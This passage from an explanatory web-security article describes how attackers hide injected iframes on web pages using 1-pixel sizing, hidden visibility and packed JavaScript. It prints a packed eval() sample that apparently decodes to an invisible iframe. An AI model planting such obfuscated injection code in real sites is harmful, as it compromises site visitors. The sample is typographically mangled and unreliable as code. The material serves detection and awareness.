They have this configuration so that hackers can hide these unwanted iframes by making them invisible. The iframe is created with width and height of 1 pixel, visually it’s just a point. They also specify a style that makes it invisible: hidden;’

These iframes are invisible to web surfers but they can be detected in the HTML code of your web page.

To hide iframes in the HTML, hackers use obfuscated scripts. Apart from obfuscated scripts, hackers are now also using what is called packed javascripts. Packing javascripts is a good thing as it improves delivery and optimization. But, as always, these legitimate things can be used in a bad way to hide and insert malicious iframe embed code generator iframes into your web page. When you check the HTML code of such web pages you don’t see any iframes, just some JavaScript with unclear purpose with no URLs and suspicious words within it. And since many modern web pages contain dozens of third-party scripts (e.g. ads, statistics, widgets, etc.) webmasters usually overlook such scripts.

Let us take the previous malicious iframe example and pack it. It would look like the following:

eval(function(p,a,c,k,e,r){e=String;if(!”.replace(/^/,String)){while(c–)r[c]=k[c]||c;k=[function(e){returnr[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);returnp}(‘[02=\’3://4/\’5=\’1\’6=\’1\’7=\’8:9;\’][/0]’,10,10,’iframe||src|http|url|width|height|style|visibility|hidden’.split(‘|’),0,{}))

If you look at the above code, it is hard to see if it is malicious or not. You will notice some words that appear suspicious, but may not be. Sometimes you may not see any suspicious text at all.